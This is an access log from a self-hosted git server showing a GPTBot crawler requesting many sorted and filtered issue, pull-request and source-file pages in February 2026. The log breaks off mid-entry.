"https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:19:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:19:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:19:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:19:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13568] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:19:19:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:19:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:19:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" -[17/Feb/2026:19:19:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:19:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=open&type=all" -[17/Feb/2026:19:19:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:19:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:19:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:19:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:19:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:19:19:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:19:19:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:19:19:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:19:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13208] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:19:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15660] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:19:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/normalizer?display=rendered" [Client 74.7.227.38] [Length 11223] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:19:19:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/websockets?display=rendered" [Client 74.7.227.38] [Length 11222] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:19:19:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10077] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:19:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:19:19:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:19:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:19:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/watchfiles?display=rendered" [Client 74.7.227.38] [Length 11220] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:19:19:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:19:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:19:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:19:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=open&type=all" -[17/Feb/2026:19:19:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:19:19:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13824] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:19:19:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11264] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:19:19:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:19:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:19:19:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:19:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:19:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:19:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:19:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:19:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33912] [Gzip 10.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:19:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:19:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:19:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:19:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:19:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=closed&type=all" -[17/Feb/2026:19:19:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 